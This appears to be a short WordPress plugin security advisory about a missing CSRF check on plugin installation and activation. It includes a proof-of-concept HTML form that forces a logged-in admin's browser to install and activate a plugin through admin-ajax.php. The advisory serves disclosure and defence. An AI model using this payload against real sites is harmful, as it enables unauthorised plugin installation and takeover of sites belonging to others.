The plugin does not have CSRF check when installing and activating plugins, which could allow attackers to make a logged in admin install arbitrary plugins from WordPress.org, and activate arbitrary ones from the blog via CSRF attacks
Make a logged in admin open a page containing the HTML code below
<form action="https://example.com/wp-admin/admin-ajax.php?action=install_plugin" method="POST">
<input type="text" name="slug" value="hello-dolly">
<input type="text" name="plugin" value="hello-dolly/hello.php">
<input type="submit" name="submit" value="submit">
</form>